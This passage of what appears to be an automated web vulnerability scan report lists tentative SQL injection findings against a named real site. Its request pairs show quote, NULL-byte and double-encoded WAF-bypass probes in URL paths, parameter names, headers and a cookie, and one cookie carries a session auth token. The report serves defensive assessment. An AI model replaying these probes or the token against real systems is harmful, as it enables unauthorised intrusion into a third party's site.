Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:25 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.34. http://www.townnews365.com/content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/about_blox/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions/about_blox/editorial'/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/about_blox/editorial''/editorial-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:40:56 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.35. http://www.townnews365.com/content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/murlinstats/editorial/editorial-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/murlinstats/editorial/editorial-core-base%00'/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/murlinstats/editorial/editorial-core-base%00''/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:40:56 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.36. http://www.townnews365.com/content_management_solutions/murlinstats/global/resources/styles/print.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/murlinstats/global/resources/styles/print.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content_management_solutions/murlinstats/global/resources/styles/print.css%2527 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/murlinstats/global/resources/styles/print.css%2527%2527 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:41:17 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.37. http://www.townnews365.com/content_management_solutions/news/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/news/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content_management_solutions/news/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/news/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4726236
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 2.1792
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp15
Content-Length: 71193
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.38. http://www.townnews365.com/content_management_solutions/news/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/news/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/news/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/news/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4679164
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:41:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7113
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp4
Content-Length: 71190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.39. http://www.townnews365.com/content_management_solutions/reader_commenting/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/reader_commenting/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions'/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions''/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:56 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.40. http://www.townnews365.com/content_management_solutions/reader_commenting/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/reader_commenting/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/reader_commenting/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2698136
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://www.townnews365.com/content_management_solutions/news/article_e7c70c41-704a-56a4-8535-7c2c71b2427a.html#user-comment-area
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0963
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp14
Content-Length: 760
Connection: close
X-Cache-Info: cached

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="http://www.townnews365.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<script type='tex
...[SNIP]...

2.41. http://www.townnews365.com/content_management_solutions/topic_page/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_management_solutions/topic_page/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/topic_page/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/topic_page/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3951648
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:40:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.8565
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 38597
Connection: close
X-Cache-Info: cached

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href="ht
...[SNIP]...

2.42. http://www.townnews365.com/content_solutions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content_solutions/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_solutions/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_solutions/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.43. http://www.townnews365.com/creatives_solutions/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /creatives_solutions%2527/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions%2527%2527/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:26 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.44. http://www.townnews365.com/creatives_solutions/ad_creation/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/ad_creation/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /creatives_solutions/ad_creation/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions/ad_creation/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:23 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.45. http://www.townnews365.com/creatives_solutions/enhanced_special_sections/demonstration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /creatives_solutions/enhanced_special_sections/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /creatives_solutions/enhanced_special_sections/demonstration/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /creatives_solutions/enhanced_special_sections/demonstration/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:19 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.46. http://www.townnews365.com/distribution_solutions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /distribution_solutions/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /distribution_solutions/?1%00'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /distribution_solutions/?1%00''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:23 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.47. http://www.townnews365.com/distribution_solutions/rss_feeds/ [TNNoMobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /distribution_solutions/rss_feeds/

Issue detail

The TNNoMobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TNNoMobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /distribution_solutions/rss_feeds/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%00'; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.9.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /distribution_solutions/rss_feeds/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%00''; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.9.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3702792
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.8479
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp11
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 64518


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.48. http://www.townnews365.com/image_16e69036-3e95-11df-b5f4-001cc4c03286.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /image_16e69036-3e95-11df-b5f4-001cc4c03286.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /image_16e69036-3e95-11df-b5f4-001cc4c03286.html' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /image_16e69036-3e95-11df-b5f4-001cc4c03286.html'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:18 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.49. http://www.townnews365.com/mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /mobile/article_1997dfba-5afa-11e0-a3fd-001cc4c03286.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

